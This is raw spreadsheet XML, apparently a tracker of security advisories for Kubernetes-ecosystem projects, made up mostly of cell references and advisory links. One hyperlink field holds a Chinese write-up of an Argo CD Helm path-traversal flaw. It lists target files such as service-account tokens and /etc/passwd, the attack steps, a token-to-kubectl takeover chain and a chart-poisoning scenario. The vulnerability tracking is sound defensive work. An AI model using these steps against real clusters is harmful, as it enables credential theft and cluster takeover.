    <hyperlink ref="O26" r:id="rId19" display="https://apiiro.com/blog/malicious-kubernetes-helm-charts-can-be-used-to-steal-sensitive-information-from-argo-cd-deployments/&#10;&#10;&#10; 1..敏感信息泄露&#10;​目标文件：&#10;Kubernetes Secrets（如/var/run/secrets/kubernetes.io/serviceaccount/token）；&#10;其他应用的明文配置文件（如数据库凭证）；&#10;系统敏感文件（如/etc/passwd）。&#10;​攻击步骤：&#10;提交包含恶意valueFiles路径的Helm Chart至仓库；&#10;Argo CD同步时触发helmTemplate逻辑；&#10;url.ParseRequestURI()误判路径为URI，跳过EnforceToCurrentRoot()检查；&#10;读取目标文件内容并解析为YAML参数，通过Argo CD API或UI泄露。&#10;2. ​横向移动与权限提升&#10;​场景延伸：&#10;窃取集群管理员Token，通过kubectl接管集群；&#10;读取其他应用的values.yaml，获取数据库连接字符串等敏感信息；&#10;利用泄露的SSH密钥访问内部系统。&#10;​利用链示例：&#10;mermaid&#10;graph TD&#10;    A[提交恶意Chart] --&gt; B[绕过路径检查]&#10;    B --&gt; C[读取ServiceAccount Token]&#10;    C --&gt; D[通过kubectl执行任意命令]&#10;    D --&gt; E[部署恶意Pod或窃取数据]&#10;3. ​供应链攻击&#10;​污染公共Helm仓库：&#10;攻击者上传包含恶意valueFiles的Chart至公共仓库（如Artifact Hub），诱导用户部署。&#10;​后果：&#10;所有使用该Chart的Argo CD实例自动同步后，敏感数据将泄露至攻击者控制的端点&#10;&#10;"/>
    <hyperlink ref="L24" r:id="rId20" display="https://github.com/argoproj/argo-workflows/issues/6441&#10;&#10;https://github.com/argoproj/argo-workflows/security/advisories/GHSA-h563-xh25-x54q"/>
    <hyperlink ref="L31" r:id="rId21" display="https://github.com/backstage/backstage/security/advisories/GHSA-wg6p-jmpc-xjmr"/>
    <hyperlink ref="L32" r:id="rId22" display="https://github.com/backstage/backstage/security/advisories/GHSA-pvv8-8fx9-h673"/>
    <hyperlink ref="K34" r:id="rId23" display="https://github.com/fluxcd/source-controller/pull/903/commits/27f4ed5a472d1bd5b6bc7a62189f20c115338b3a"/>
    <hyperlink ref="L35" r:id="rId24" display="https://github.com/fluxcd/flux2/security/advisories/GHSA-p2g7-xwvr-rrw3"/>
    <hyperlink ref="L34" r:id="rId25" display="https://github.com/fluxcd/flux2/security/advisories/GHSA-f4p5-x4vc-mh4v"/>
    <hyperlink ref="L37" r:id="rId26" display="https://github.com/fluxcd/flux2/security/advisories/GHSA-7pwf-jg34-hxwp"/>
    <hyperlink ref="L18" r:id="rId27" display="https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364&#10;&#10;google research:&#10;https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm"/>
    <hyperlink ref="L19" r:id="rId28" display="https://bugzilla.redhat.com/show_bug.cgi?id=1848951"/>
    <hyperlink ref="L15" r:id="rId29" display="https://github.com/containerd/containerd/security/advisories/GHSA-5ffw-gxpp-mxpf"/>
    <hyperlink ref="L42" r:id="rId30" display="https://github.com/metal3-io/baremetal-operator/security/advisories/GHSA-pqfh-xh7w-7h3p"/>
    <hyperlink ref="L2" r:id="rId31" display="https://github.com/kubernetes/kubernetes/issues/126744"/>
    <hyperlink ref="L38" r:id="rId32" display="https://github.com/fluxcd/flux2/security/advisories/GHSA-vvmq-fwmg-2gjc" tooltip="https://github.com/fluxcd/flux2/security/advisories/GHSA-vvmq-fwmg-2gjc"/>
    <hyperlink ref="L21" r:id="rId33" display="https://github.com/argoproj/argo-cd/security/advisories/GHSA-q4w5-4gq2-98vm"/>
    <hyperlink ref="L22" r:id="rId34" display="https://github.com/argoproj/argo-cd/security/advisories/GHSA-jhqp-vf4w-rpwq"/>
    <hyperlink ref="L47" r:id="rId35" display="https://github.com/kubernetes/kubernetes/issues/131006" tooltip="https://github.com/kubernetes/kubernetes/issues/131006"/>
    <hyperlink ref="L46" r:id="rId36" display="https://github.com/kubernetes/kubernetes/issues/131008" tooltip="https://github.com/kubernetes/kubernetes/issues/131008"/>
    <hyperlink ref="L45" r:id="rId37" display="https://github.com/kubernetes/kubernetes/issues/131007" tooltip="https://github.com/kubernetes/kubernetes/issues/131007"/>
    <hyperlink ref="L48" r:id="rId38" display="https://github.com/kubernetes/kubernetes/issues/131005&#10;&#10;https://github.com/advisories/GHSA-242m-6h72-7hgp"/>
    <hyperlink ref="K47" r:id="rId39" display="https://github.com/kubernetes/ingress-nginx/pull/13068/commits/ab470eb920924d62a197ebddd8a4cc3031a77ddf"/>
    <hyperlink ref="K46" r:id="rId40" display="https://github.com/kubernetes/ingress-nginx/pull/13068/commits/2e9f37380afb7853fa6daa1c3e6659550aadfd90"/>
  </hyperlink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9"/>
  <sheetViews>
    <sheetView topLeftCell="A19" workbookViewId="0">
      <selection activeCell="A1" sqref="A$1:A$1048576"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.89166666666667" defaultRowHeight="13.5"/>
  <cols>
    <col min="1" max="1" width="50.125" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:1">
      <c r="A1" t="s">
        <v>1388</v>
      </c>
    </row>
    <row r="2" spans="1:1">
      <c r="A2" s="53" t="s">
        <v>57</v>
      </c>
    </row>
    <row r="3" spans="1:1">
      <c r="A3" s="53" t="s">
        <v>1040</v>
      </c>
    </row>
    <row r="4" spans="1:1">
      <c r="A4" s="53" t="s">
        <v>1048</v>
      </c>
    </row>
    <row r="5" spans="1:1">
      <c r="A5" s="53" t="s">
        <v>1053</v>
      </c>
    </row>
    <row r="6" spans="1:1">
      <c r="A6" s="53" t="s">
        <v>153</v>
      </c>
    </row>
    <row r="7" spans="1:1">
      <c r="A7" s="53" t="s">
        <v>171</v>
      </c>
    </row>
    <row r="8" spans="1:1">
      <c r="A8" s="53" t="s">
        <v>183</v>
      </c>
    </row>
    <row r="9" spans="1:1">
      <c r="A9" s="53" t="s">
        <v>193</v>
      </c>
    </row>
    <row r="10" spans="1:1">
      <c r="A10" s="53" t="s">
        <v>209</v>
      </c>
    </row>
    <row r="11" spans="1:1">
      <c r="A11" s="53" t="s">
        <v>1093</v>
      </c>
    </row>
    <row r="12" spans="1:1">
      <c r="A12" s="53" t="s">
        <v>244</v>
      </c>
    </row>
    <row r="13" spans="1:1">
      <c r="A13" s="53" t="s">
        <v>259</v>
      </c>
    </row>
    <row r="14" spans="1:1">
      <c r="A14" s="53" t="s">
        <v>282</v>
      </c>
    </row>
    <row r="15" spans="1:1">
      <c r="A15" s="53" t="s">
        <v>302</v>
      </c>
    </row>
    <row r="16" spans="1:1">
      <c r="A16" s="53" t="s">
        <v>323</v>
      </c>
    </row>
    <row r="17" spans="1:1">
      <c r="A17" s="53" t="s">
        <v>336</v>
      </c>
    </row>
    <row r="18" spans="1:1">
      <c r="A18" s="53" t="s">
        <v>1138</v>
      </c>
    </row>
    <row r="19" spans="1:1">
      <c r="A19" s="53" t="s">
        <v>374</v>
      </c>
    </row>
    <row r="20" spans="1:1">
      <c r="A20" s="53" t="s">
        <v>386</v>
      </c>
    </row>
    <row r="21" spans="1:1">
      <c r="A21" s="53" t="s">
        <v>453</v>
      </c>
    </row>
    <row r="22" spans="1:1">
      <c r="A22" s="53" t="s">
        <v>1167</v>
      </c>
    </row>
    <row r="23" spans="1:1">
      <c r="A23" s="53" t="s">
        <v>1178</v>
      </c>
    </row>
    <row r="24" spans="1:1">
      <c r="A24" s="53" t="s">
        <v>1187</v>
      </c>
    </row>
    <row r="25" spans="1:1">
      <c r="A25" s="53" t="s">
        <v>545</v>
      </c>
    </row>
    <row r="26" spans="1:1">
      <c r="A26" s="53" t="s">
        <v>569</v>
      </c>
    </row>
    <row r="27" spans="1:1">
      <c r="A27" s="53" t="s">
        <v>1218</v>
      </c>
    </row>
    <row r="28" spans="1:1">
      <c r="A28" s="53" t="s">
        <v>628</v>
      </c>
    </row>
    <row r="29" ht="15.75" spans="1:1">
      <c r="A29" s="54" t="s">
        <v>639</v>
      </c>
    </row>
    <row r="30" spans="1:1">
      <c r="A30" s="53" t="s">
        <v>1238</v>
      </c>
    </row>
    <row r="31" spans="1:1">
      <c r="A31" s="53" t="s">
        <v>1246</v>
      </c>
    </row>
    <row r="32" spans="1:1">
      <c r="A32" s="53" t="s">
        <v>682</v>
      </c>
    </row>
    <row r="33" spans="1:1">
      <c r="A33" s="53" t="s">
        <v>693</v>
      </c>
    </row>
    <row r="34" spans="1:1">
      <c r="A34" s="53" t="s">
        <v>1262</v>
      </c>
    </row>
    <row r="35" spans="1:1">
      <c r="A35" s="53" t="s">
        <v>1275</v>
      </c>
    </row>
    <row r="36" spans="1:1">
      <c r="A36" s="53" t="s">
        <v>761</v>
      </c>
    </row>
    <row r="37" spans="1:1">
      <c r="A37" s="53" t="s">
        <v>782</v>
      </c>
    </row>
    <row r="38" spans="1:1">
      <c r="A38" s="53" t="s">
        <v>1305</v>
      </c>
    </row>
    <row r="39" spans="1:1">
      <c r="A39" s="53" t="s">
        <v>1313</v>
      </c>
    </row>
    <row r="40" spans="1:1">
      <c r="A40" s="53" t="s">
        <v>852</v>
      </c>
    </row>
    <row r="41" spans="1:1">
      <c r="A41" s="53" t="s">
        <v>865</v>
      </c>
    </row>
    <row r="42" spans="1:1">
      <c r="A42" s="53" t="s">
        <v>878</v>
      </c>
    </row>
    <row r="43" spans="1:1">
      <c r="A43" s="53" t="s">
        <v>890</v>
      </c>
    </row>
    <row r="44" ht="14.25" spans="1:1">
      <c r="A44" s="55" t="s">
        <v>934</v>
      </c>
    </row>
    <row r="45" ht="14.25" spans="1:1">
      <c r="A45" s="55" t="s">
        <v>1355</v>
      </c>
    </row>
    <row r="46" spans="1:1">
      <c r="A46" s="27" t="s">
        <v>1360</v>
      </c>
    </row>
    <row r="47" spans="1:1">
      <c r="A47" s="53" t="s">
        <v>1368</v>
      </c>
    </row>
    <row r="48" spans="1:1">
      <c r="A48" s="53" t="s">
        <v>1375</v>
      </c>
    </row>
    <row r="49" spans="1:1">
      <c r="A49" s="53" t="s">
        <v>1381</v>
      </c>
    </row>
  </sheetData>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8"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane xSplit="1" ySplit="1" topLeftCell="H2" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="S2" sqref="S2"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.89166666666667" defaultRowHeight="13.5"/>
  <cols>
    <col min="1" max="4" width="8.89166666666667" style="47"/>
    <col min="5" max="5" width="31.3333333333333" style="47" customWidth="1"/>
    <col min="6" max="6" width="34.3333333333333" style="47" customWidth="1"/>
    <col min="7" max="7" width="48.8916666666667" style="47" customWidth="1"/>
    <col min="8" max="10" width="8.89166666666667" style="47" customWidth="1"/>
    <col min="11" max="11" width="31.775" style="47" customWidth="1"/>
    <col min="12" max="12" width="8.89166666666667" style="47"/>
    <col min="13" max="13" width="31.3333333333333" style="47" customWidth="1"/>
    <col min="14" max="26" width="8.89166666666667" style="47" customWidth="1"/>
    <col min="27" max="32" width="8.89166666666667" style="47"/>
    <col min="33" max="37" width="8.89166666666667" style="47" hidden="1" customWidth="1"/>
    <col min="38" max="38" width="13.775" style="47" customWidth="1"/>
    <col min="39" max="16384" width="8.89166666666667" style="47"/>
  </cols>
  <sheetData>
    <row r="1" s="30" customFormat="1" ht="57" customHeight="1" spans="1:39">
      <c r="A1" s="5" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="5" t="s">
        <v>1014</v>
      </c>
      <c r="C1" s="30" t="s">
        <v>1389</v>
      </c>
      <c r="D1" s="29" t="s">
        <v>1015</v>
      </c>
      <c r="E1" s="30" t="s">
        <v>1016</v>
      </c>
      <c r="F1" s="30" t="s">
        <v>1017</v>
      </c>
      <c r="G1" s="5" t="s">
        <v>19</v>
      </c>
      <c r="H1" s="30" t="s">
        <v>1018</v>
      </c>
      <c r="I1" s="49" t="s">
        <v>1</v>
      </c>
      <c r="J1" s="5" t="s">
        <v>5</v>
      </c>
      <c r="K1" s="44" t="s">
        <v>6</v>
      </c>
      <c r="L1" s="5" t="s">
        <v>7</v>
      </c>
      <c r="M1" s="5" t="s">
        <v>9</v>
      </c>
      <c r="N1" s="50" t="s">
        <v>14</v>
      </c>
      <c r="O1" s="37" t="s">
        <v>20</v>
      </c>
      <c r="P1" s="37" t="s">
        <v>21</v>
      </c>
      <c r="Q1" s="37" t="s">
        <v>1390</v>
      </c>
      <c r="R1" s="37" t="s">
        <v>1391</v>
      </c>
      <c r="S1" s="37" t="s">
        <v>1392</v>
      </c>
      <c r="T1" s="37" t="s">
        <v>22</v>
      </c>
      <c r="U1" s="37" t="s">
        <v>1021</v>
      </c>
      <c r="V1" s="37" t="s">
        <v>26</v>
      </c>
      <c r="W1" s="37" t="s">
        <v>1393</v>
      </c>
      <c r="X1" s="37" t="s">
        <v>27</v>
      </c>
      <c r="Y1" s="37" t="s">
        <v>1394</v>
      </c>
      <c r="Z1" s="37" t="s">
        <v>1395</v>
      </c>
      <c r="AA1" s="37" t="s">
        <v>1396</v>
      </c>
      <c r="AB1" s="37" t="s">
        <v>1397</v>
      </c>
      <c r="AC1" s="37" t="s">
        <v>1398</v>
      </c>
      <c r="AD1" s="37" t="s">
        <v>1399</v>
      </c>
      <c r="AE1" s="37" t="s">
        <v>1400</v>
      </c>
      <c r="AF1" s="37" t="s">
        <v>1401</v>
      </c>
      <c r="AG1" s="5" t="s">
        <v>41</v>
      </c>
      <c r="AH1" s="5" t="s">
        <v>42</v>
      </c>
      <c r="AI1" s="5" t="s">
        <v>43</v>
      </c>
      <c r="AJ1" s="5" t="s">
        <v>44</v>
      </c>
      <c r="AK1" s="5" t="s">
        <v>45</v>
      </c>
      <c r="AL1" s="37" t="s">
        <v>46</v>
      </c>
      <c r="AM1" s="37" t="s">
        <v>1402</v>
      </c>
    </row>
    <row r="2" s="30" customFormat="1" ht="184" customHeight="1" spans="1:39">
      <c r="A2" s="5" t="s">
        <v>1022</v>
      </c>
      <c r="B2" s="5" t="s">
        <v>57</v>
      </c>
      <c r="C2" s="30" t="s">
        <v>1403</v>
      </c>
      <c r="D2" s="30" t="s">
        <v>1023</v>
      </c>
      <c r="E2" s="30" t="s">
        <v>1024</v>
      </c>
      <c r="F2" s="30" t="s">
        <v>1025</v>
      </c>
      <c r="G2" s="5" t="s">
        <v>1026</v>
      </c>
      <c r="H2" s="30" t="s">
        <v>1027</v>
      </c>
      <c r="I2" s="6"/>
      <c r="J2" s="6" t="s">
        <v>61</v>
      </c>
      <c r="K2" s="15" t="s">
        <v>62</v>
      </c>
      <c r="L2" s="5" t="s">
        <v>63</v>
      </c>
      <c r="M2" s="5" t="s">
        <v>65</v>
      </c>
      <c r="N2" s="6" t="s">
        <v>70</v>
      </c>
      <c r="O2" s="6" t="s">
        <v>70</v>
      </c>
      <c r="P2" s="6" t="s">
        <v>76</v>
      </c>
      <c r="Q2" s="6" t="s">
        <v>1404</v>
      </c>
      <c r="R2" s="6"/>
      <c r="S2" s="6">
        <v>1</v>
      </c>
      <c r="T2" s="6" t="s">
        <v>147</v>
      </c>
      <c r="U2" s="6" t="s">
        <v>1030</v>
      </c>
      <c r="V2" s="6" t="s">
        <v>81</v>
      </c>
      <c r="W2" s="6"/>
      <c r="X2" s="6" t="s">
        <v>82</v>
      </c>
      <c r="Y2" s="5" t="s">
        <v>1405</v>
      </c>
      <c r="Z2" s="6"/>
      <c r="AA2" s="5" t="s">
        <v>70</v>
      </c>
      <c r="AB2" s="5">
        <v>1</v>
      </c>
      <c r="AC2" s="5"/>
      <c r="AD2" s="5" t="s">
        <v>1406</v>
      </c>
      <c r="AE2" s="5" t="s">
        <v>1407</v>
      </c>
      <c r="AF2" s="5" t="s">
        <v>1408</v>
      </c>
      <c r="AG2" s="5" t="s">
        <v>94</v>
      </c>
      <c r="AH2" s="5" t="s">
        <v>1032</v>
      </c>
      <c r="AI2" s="5" t="s">
        <v>1033</v>
      </c>
      <c r="AJ2" s="5" t="s">
        <v>97</v>
      </c>
      <c r="AK2" s="5" t="s">
        <v>1034</v>
      </c>
      <c r="AL2" s="5" t="s">
        <v>1409</v>
      </c>
      <c r="AM2" s="30">
        <v>3</v>
      </c>
    </row>
    <row r="3" s="30" customFormat="1" ht="409.5" spans="1:39">
      <c r="A3" s="5" t="s">
        <v>107</v>
      </c>
      <c r="B3" s="5" t="s">
        <v>1040</v>
      </c>
      <c r="C3" s="30" t="s">
        <v>1410</v>
      </c>
      <c r="D3" s="30" t="s">
        <v>1041</v>
      </c>
      <c r="E3" s="30" t="s">
        <v>1042</v>
      </c>
      <c r="F3" s="30" t="s">
        <v>1043</v>
      </c>
      <c r="G3" s="5" t="s">
        <v>116</v>
      </c>
      <c r="H3" s="30" t="s">
        <v>1411</v>
      </c>
      <c r="I3" s="6" t="s">
        <v>108</v>
      </c>
      <c r="J3" s="6" t="s">
        <v>111</v>
      </c>
      <c r="K3" s="6" t="s">
        <v>112</v>
      </c>
      <c r="L3" s="5" t="s">
        <v>63</v>
      </c>
      <c r="M3" s="5" t="s">
        <v>1412</v>
      </c>
      <c r="N3" s="6" t="s">
        <v>70</v>
      </c>
      <c r="O3" s="6" t="s">
        <v>84</v>
      </c>
      <c r="P3" s="6"/>
      <c r="Q3" s="6"/>
      <c r="R3" s="6"/>
      <c r="S3" s="6"/>
      <c r="T3" s="6" t="s">
        <v>117</v>
      </c>
      <c r="U3" s="6" t="s">
        <v>1030</v>
      </c>
      <c r="V3" s="6" t="s">
        <v>81</v>
      </c>
      <c r="W3" s="6"/>
      <c r="X3" s="6" t="s">
        <v>82</v>
      </c>
      <c r="Y3" s="5" t="s">
        <v>122</v>
      </c>
      <c r="Z3" s="6" t="s">
        <v>1413</v>
      </c>
      <c r="AA3" s="5" t="s">
        <v>70</v>
      </c>
      <c r="AB3" s="5">
        <v>1</v>
      </c>
      <c r="AC3" s="5"/>
      <c r="AD3" s="5" t="s">
        <v>1406</v>
      </c>
      <c r="AE3" s="5" t="s">
        <v>1407</v>
      </c>
      <c r="AF3" s="5" t="s">
        <v>1408</v>
      </c>
      <c r="AG3" s="5" t="s">
        <v>94</v>
      </c>
      <c r="AH3" s="5" t="s">
        <v>1032</v>
      </c>
      <c r="AI3" s="5" t="s">
        <v>1033</v>
      </c>
      <c r="AJ3" s="5" t="s">
        <v>97</v>
      </c>
      <c r="AK3" s="5" t="s">
        <v>1034</v>
      </c>
      <c r="AL3" s="5" t="s">
        <v>1414</v>
      </c>
      <c r="AM3" s="30">
        <v>3</v>
      </c>
    </row>
    <row r="4" s="30" customFormat="1" ht="409.5" spans="1:39">
      <c r="A4" s="5" t="s">
        <v>131</v>
      </c>
      <c r="B4" s="5" t="s">
        <v>1048</v>
      </c>
      <c r="C4" s="30" t="s">
        <v>132</v>
      </c>
      <c r="D4" s="30" t="s">
        <v>1049</v>
      </c>
      <c r="E4" s="30" t="s">
        <v>1050</v>
      </c>
      <c r="F4" s="30" t="s">
        <v>1051</v>
      </c>
      <c r="G4" s="5" t="s">
        <v>116</v>
      </c>
      <c r="H4" s="30" t="s">
        <v>1052</v>
      </c>
      <c r="I4" s="6" t="s">
        <v>71</v>
      </c>
      <c r="J4" s="6" t="s">
        <v>134</v>
      </c>
      <c r="K4" s="6" t="s">
        <v>135</v>
      </c>
      <c r="L4" s="5" t="s">
        <v>63</v>
      </c>
      <c r="M4" s="5" t="s">
        <v>136</v>
      </c>
      <c r="N4" s="6" t="s">
        <v>70</v>
      </c>
      <c r="O4" s="6" t="s">
        <v>84</v>
      </c>
      <c r="P4" s="6"/>
      <c r="Q4" s="6"/>
      <c r="R4" s="6"/>
      <c r="S4" s="6"/>
      <c r="T4" s="6" t="s">
        <v>117</v>
      </c>
      <c r="U4" s="6" t="s">
        <v>1030</v>
      </c>
      <c r="V4" s="6" t="s">
        <v>81</v>
      </c>
      <c r="W4" s="6"/>
      <c r="X4" s="6" t="s">
        <v>82</v>
      </c>
      <c r="Y4" s="5" t="s">
        <v>122</v>
      </c>
      <c r="Z4" s="6" t="s">
        <v>1415</v>
      </c>
      <c r="AA4" s="5" t="s">
        <v>70</v>
      </c>
      <c r="AB4" s="5">
        <v>1</v>
      </c>
      <c r="AC4" s="5"/>
      <c r="AD4" s="5" t="s">
        <v>1406</v>
      </c>
      <c r="AE4" s="5" t="s">
        <v>1416</v>
      </c>
      <c r="AF4" s="5" t="s">
        <v>1417</v>
      </c>
      <c r="AG4" s="5" t="s">
        <v>94</v>
      </c>
      <c r="AH4" s="5" t="s">
        <v>1032</v>
      </c>
      <c r="AI4" s="5" t="s">
        <v>1033</v>
      </c>
      <c r="AJ4" s="5" t="s">
        <v>97</v>
      </c>
      <c r="AK4" s="5" t="s">
        <v>1034</v>
      </c>
      <c r="AL4" s="5" t="s">
        <v>1418</v>
      </c>
      <c r="AM4" s="30">
        <v>3</v>
      </c>
    </row>
    <row r="5" s="30" customFormat="1" ht="409.5" spans="1:39">
      <c r="A5" s="5" t="s">
        <v>138</v>
      </c>
      <c r="B5" s="5" t="s">
        <v>1053</v>
      </c>
      <c r="C5" s="30" t="s">
        <v>1419</v>
      </c>
      <c r="D5" s="30" t="s">
        <v>1054</v>
      </c>
      <c r="E5" s="30" t="s">
        <v>1055</v>
      </c>
      <c r="F5" s="30" t="s">
        <v>1056</v>
      </c>
      <c r="G5" s="5" t="s">
        <v>146</v>
      </c>
      <c r="H5" s="30" t="s">
        <v>1057</v>
      </c>
      <c r="I5" s="6" t="s">
        <v>71</v>
      </c>
      <c r="J5" s="6" t="s">
        <v>142</v>
      </c>
      <c r="K5" s="6" t="s">
        <v>143</v>
      </c>
      <c r="L5" s="5" t="s">
        <v>63</v>
      </c>
      <c r="M5" s="5" t="s">
        <v>144</v>
      </c>
      <c r="N5" s="6" t="s">
        <v>70</v>
      </c>
      <c r="O5" s="6" t="s">
        <v>70</v>
      </c>
      <c r="P5" s="6" t="s">
        <v>1420</v>
      </c>
      <c r="Q5" s="6" t="s">
        <v>1404</v>
      </c>
      <c r="R5" s="6"/>
      <c r="S5" s="6">
        <v>1</v>
      </c>
      <c r="T5" s="6" t="s">
        <v>147</v>
      </c>
      <c r="U5" s="6" t="s">
        <v>1030</v>
      </c>
      <c r="V5" s="6" t="s">
        <v>81</v>
      </c>
      <c r="W5" s="6"/>
      <c r="X5" s="6" t="s">
        <v>82</v>
      </c>
      <c r="Y5" s="5" t="s">
        <v>1405</v>
      </c>
      <c r="Z5" s="6"/>
      <c r="AA5" s="5" t="s">
        <v>70</v>
      </c>
      <c r="AB5" s="5">
        <v>1</v>
      </c>
      <c r="AC5" s="5"/>
      <c r="AD5" s="5" t="s">
        <v>1406</v>
      </c>
      <c r="AE5" s="5" t="s">
        <v>1407</v>
      </c>
      <c r="AF5" s="5" t="s">
        <v>1421</v>
      </c>
      <c r="AG5" s="5" t="s">
        <v>94</v>
      </c>
      <c r="AH5" s="5" t="s">
        <v>1032</v>
      </c>
      <c r="AI5" s="5" t="s">
        <v>1033</v>
      </c>
      <c r="AJ5" s="5" t="s">
        <v>97</v>
      </c>
      <c r="AK5" s="5" t="s">
        <v>1034</v>
      </c>
      <c r="AL5" s="5" t="s">
        <v>151</v>
      </c>
      <c r="AM5" s="30">
        <v>3</v>
      </c>
    </row>
    <row r="6" s="30" customFormat="1" ht="409.5" spans="1:39">
      <c r="A6" s="5" t="s">
        <v>1058</v>
      </c>
      <c r="B6" s="5" t="s">
        <v>153</v>
      </c>
      <c r="C6" s="30" t="s">
        <v>1422</v>
      </c>
      <c r="D6" s="30" t="s">
        <v>1059</v>
      </c>
      <c r="E6" s="30" t="s">
        <v>1060</v>
      </c>
      <c r="F6" s="30" t="s">
        <v>1061</v>
      </c>
      <c r="G6" s="5" t="s">
        <v>160</v>
      </c>
      <c r="H6" s="30" t="s">
        <v>1062</v>
      </c>
      <c r="I6" s="49"/>
      <c r="J6" s="5" t="s">
        <v>155</v>
      </c>
      <c r="K6" s="44" t="s">
        <v>156</v>
      </c>
      <c r="L6" s="5" t="s">
        <v>63</v>
      </c>
      <c r="M6" s="5" t="s">
        <v>157</v>
      </c>
      <c r="N6" s="6" t="s">
        <v>70</v>
      </c>
      <c r="O6" s="6" t="s">
        <v>84</v>
      </c>
      <c r="P6" s="5"/>
      <c r="Q6" s="5"/>
      <c r="R6" s="5"/>
      <c r="S6" s="5"/>
      <c r="T6" s="5" t="s">
        <v>147</v>
      </c>
      <c r="U6" s="6" t="s">
        <v>1030</v>
      </c>
      <c r="V6" s="6" t="s">
        <v>81</v>
      </c>
      <c r="W6" s="6"/>
      <c r="X6" s="6" t="s">
        <v>82</v>
      </c>
      <c r="Y6" s="5" t="s">
        <v>122</v>
      </c>
      <c r="Z6" s="6"/>
      <c r="AA6" s="5" t="s">
        <v>70</v>
      </c>
      <c r="AB6" s="5">
        <v>1</v>
      </c>
      <c r="AC6" s="5"/>
      <c r="AD6" s="5" t="s">
        <v>1406</v>
      </c>
      <c r="AE6" s="5" t="s">
        <v>1407</v>
      </c>
      <c r="AF6" s="5" t="s">
        <v>1421</v>
      </c>
      <c r="AG6" s="5" t="s">
        <v>94</v>
      </c>
      <c r="AH6" s="5" t="s">
        <v>1032</v>
      </c>
      <c r="AI6" s="5" t="s">
        <v>1033</v>
      </c>
      <c r="AJ6" s="5" t="s">
        <v>97</v>
      </c>
      <c r="AK6" s="5" t="s">
        <v>1034</v>
      </c>
      <c r="AL6" s="5" t="s">
        <v>151</v>
      </c>
      <c r="AM6" s="30">
        <v>3</v>
      </c>
    </row>
    <row r="7" s="30" customFormat="1" ht="409.5" spans="1:39">
      <c r="A7" s="5" t="s">
        <v>1064</v>
      </c>
      <c r="B7" s="5" t="s">
        <v>171</v>
      </c>
      <c r="C7" s="30" t="s">
        <v>1423</v>
      </c>
      <c r="D7" s="30" t="s">
        <v>1065</v>
      </c>
      <c r="E7" s="30" t="s">
        <v>1066</v>
      </c>
      <c r="F7" s="30" t="s">
        <v>1067</v>
      </c>
      <c r="G7" s="5" t="s">
        <v>1068</v>
      </c>
      <c r="H7" s="30" t="s">
        <v>1069</v>
      </c>
      <c r="I7" s="49"/>
      <c r="J7" s="5" t="s">
        <v>174</v>
      </c>
      <c r="K7" s="44" t="s">
        <v>175</v>
      </c>
      <c r="L7" s="5" t="s">
        <v>63</v>
      </c>
      <c r="M7" s="5" t="s">
        <v>1070</v>
      </c>
      <c r="N7" s="49" t="s">
        <v>70</v>
      </c>
      <c r="O7" s="6" t="s">
        <v>84</v>
      </c>
      <c r="P7" s="5"/>
      <c r="Q7" s="5"/>
      <c r="R7" s="5"/>
      <c r="S7" s="5"/>
      <c r="T7" s="5" t="s">
        <v>147</v>
      </c>
      <c r="U7" s="6" t="s">
        <v>1030</v>
      </c>
      <c r="V7" s="6" t="s">
        <v>81</v>
      </c>
      <c r="W7" s="6"/>
      <c r="X7" s="6" t="s">
        <v>82</v>
      </c>
      <c r="Y7" s="5" t="s">
        <v>1424</v>
      </c>
      <c r="Z7" s="6" t="s">
        <v>1425</v>
      </c>
      <c r="AA7" s="5" t="s">
        <v>70</v>
      </c>
      <c r="AB7" s="5">
        <v>1</v>
      </c>
      <c r="AC7" s="5"/>
      <c r="AD7" s="5" t="s">
        <v>1406</v>
      </c>
      <c r="AE7" s="5" t="s">
        <v>1407</v>
      </c>
      <c r="AF7" s="5" t="s">
        <v>1421</v>
      </c>
      <c r="AG7" s="5" t="s">
        <v>94</v>
      </c>
      <c r="AH7" s="5" t="s">
        <v>1032</v>
      </c>
      <c r="AI7" s="5" t="s">
        <v>1033</v>
      </c>
      <c r="AJ7" s="5" t="s">
        <v>97</v>
      </c>
      <c r="AK7" s="5" t="s">
        <v>1034</v>
      </c>
      <c r="AL7" s="5" t="s">
        <v>151</v>
      </c>
      <c r="AM7" s="30">
        <v>3</v>
      </c>
    </row>
    <row r="8" s="30" customFormat="1" ht="409.5" spans="1:39">
      <c r="A8" s="5" t="s">
        <v>183</v>
      </c>
      <c r="B8" s="5" t="s">
        <v>183</v>
      </c>
      <c r="C8" s="30" t="s">
        <v>1426</v>
      </c>
      <c r="D8" s="30" t="s">
        <v>1071</v>
      </c>
      <c r="E8" s="30" t="s">
        <v>1072</v>
      </c>
      <c r="F8" s="30" t="s">
        <v>1073</v>
      </c>
      <c r="G8" s="5" t="s">
        <v>189</v>
      </c>
      <c r="H8" s="30" t="s">
        <v>1074</v>
      </c>
      <c r="I8" s="49" t="s">
        <v>184</v>
      </c>
      <c r="J8" s="5" t="s">
        <v>186</v>
      </c>
      <c r="K8" s="44" t="s">
        <v>187</v>
      </c>
      <c r="L8" s="5" t="s">
        <v>63</v>
      </c>
      <c r="M8" s="5" t="s">
        <v>188</v>
      </c>
      <c r="N8" s="49" t="s">
        <v>70</v>
      </c>
      <c r="O8" s="6" t="s">
        <v>84</v>
      </c>
      <c r="P8" s="6"/>
      <c r="Q8" s="6"/>
      <c r="R8" s="6"/>
      <c r="S8" s="6"/>
      <c r="T8" s="6" t="s">
        <v>117</v>
      </c>
      <c r="U8" s="6" t="s">
        <v>1030</v>
      </c>
      <c r="V8" s="6" t="s">
        <v>81</v>
      </c>
      <c r="W8" s="6"/>
      <c r="X8" s="6" t="s">
        <v>82</v>
      </c>
      <c r="Y8" s="5" t="s">
        <v>122</v>
      </c>
      <c r="Z8" s="6"/>
      <c r="AA8" s="5" t="s">
        <v>70</v>
      </c>
      <c r="AB8" s="5">
        <v>1</v>
      </c>
      <c r="AC8" s="5"/>
      <c r="AD8" s="5" t="s">
        <v>1406</v>
      </c>
      <c r="AE8" s="5" t="s">
        <v>1416</v>
      </c>
      <c r="AF8" s="5" t="s">
        <v>1417</v>
      </c>
